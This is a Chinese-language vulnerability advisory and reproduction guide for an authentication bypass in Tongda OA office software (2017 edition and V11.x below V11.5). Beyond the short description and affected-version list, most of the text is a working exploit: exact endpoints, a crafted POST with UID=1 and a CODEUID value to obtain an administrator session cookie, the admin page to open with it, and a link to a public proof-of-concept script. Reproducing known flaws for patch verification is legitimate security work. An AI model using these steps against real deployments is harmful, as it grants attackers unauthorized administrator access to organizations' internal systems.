一、漏洞说明:
通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析,在该次安全更新中修复了包括任意用户登录在内的高危漏洞。
攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。
二、版本影响:
·通达 OA 2017 版
·通达 OA V11.X < V11.5
三、漏洞复现:
1.环境搭建
1)下载通达OA V11.4:
https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe
2)运行,安装,访问http://localhost
2.漏洞复现
1.手工利用方式:
1)访问文件/ispirit/login_code.php以获取codeuid。
2)访问文件/logincheck_code.php,同时抓包并修改请求包,将请求方式修改为POST方式,传递CODEUID和用户UID,返回的PHPSESSID即身份缓存:
·将请求方式修改为POST
·增加字段:Content-Type: application/x-www-form-urlencoded
·增加参数:UID=1&CODEUID=_PC{D0FD779B-1E0B-DABE-0CF2-2F7C34438498}&
3)利用身份缓存,访问管理员后台首页:/general/index.php?isIE=0&modify_pwd=0
2.脚本利用方式(需要python3环境):
1)下载poc,链接:https://github.com/NS-Sp4ce/TongDaOA-Fake-User
2)利用脚本获取SESSIONID:
3)访问管理后台首页,抓包,将cookie内容替换成PHPSESSID
登录成功: